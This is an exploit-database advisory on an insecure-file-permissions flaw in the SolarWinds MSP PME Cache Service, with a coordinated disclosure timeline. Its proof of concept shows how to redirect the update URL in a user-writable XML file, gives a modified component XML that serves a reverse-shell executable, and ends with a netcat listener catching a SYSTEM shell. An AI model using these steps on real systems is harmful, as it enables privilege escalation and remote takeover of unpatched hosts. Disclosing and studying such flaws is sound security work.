Exploits / Vulnerability Discovered : 2020-05-11 |
Type : local |
Platform : windows
This exploit / vulnerability Solarwinds msp pme cache service 1.1.14 insecure file permissions is for educational purposes only and if it is used you will do on your own risk!
Vulnerable version
==================
SolarWinds MSP PME (Patch Management Engine) before 1.1.15
Timeline
========
2020-04-24 Vulnerability discovered
2020-04-27 Send details to SolarWinds PSIRT
2020-04-27 SolarWinds confirmed the vulnerability
2020-05-05 SolarWinds released PME version 1.1.15
2020-05-06 Public disclosure
Description
===========
An error with insecure file permissions has occurred in the SolarWinds
MSP Cache Service, which is part of the Advanced Monitoring Agent and
can lead to code execution. The SolarWinds MSP Cache Service is
typically used to get new update definition files and versions for
ThirdPartyPatch.exe or SolarWinds MSP Patch Management Engine Setup. The
XML file CacheService.xml in %PROGRAMDATA%\SolarWinds
MSP\SolarWinds.MSP.CacheService\config\ is writable by normal users, so
that the parameter SISServerURL can be changed, which controls the
location of the updates. After some analysis, we were able to provide
modified XML files (PMESetup_details.xml and
ThirdPartyPatch_details.xml) that point to an executable file with a
reverse TCP payload using our controlled SISServerURL web server for
SolarWinds MSP Cache Service.
Proof of Concept (PoC)
======================
As we can see, NTFS change permissions are set to CacheService.xml by
default. Any user on the system who is in group users can change the
file content. This is especially a big problem on terminal servers or
multi-user systems.
Place the modified xml files (PMESetup_details.xml or
ThirdPartyPatch_details.xml) on the web server in the path
/ComponentData/RMM/1/, calculate MD5, SHA1 and SHA256 checksums of the
executable, set correct values for SizeInBytes and increase the version.
<ComponentDetails xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Name>Third Party Patch</Name>
<Description>
Third Party Patch application for Patch Management Engine RMM v 1 and later
</Description>
<MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
<SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
<SHA256Checksum>
80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
</SHA256Checksum>
<SizeInBytes>7168</SizeInBytes>
<DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
<FileName>solarwinds-shell.exe</FileName>
<Architecture>x86,x64</Architecture>
<Locale>all</Locale>
<Version>1.2.1.95</Version>
</ComponentDetails>
4. Malicious executable download
After restarting the system or reloading the CacheService.xml, the
service connects to the web server controlled by the attacker and
downloads the executable file. This is then stored in the path
%PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\cache\ and
%PROGRAMDATA%\SolarWinds MSP\PME\archives\.
After a certain time the executable file is executed by SolarWinds MSP
RPC Server service and establishes a connection with the rights of the
system user to the attacker.
[~]: nc -nlvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [x.x.x.x] port 4444 [tcp/*] accepted (family 2, sport 49980)
Microsoft Windows [Version 10.0.18363.778]
(c) 2019 Microsoft Corporation. Alle Rechte vorbehalten.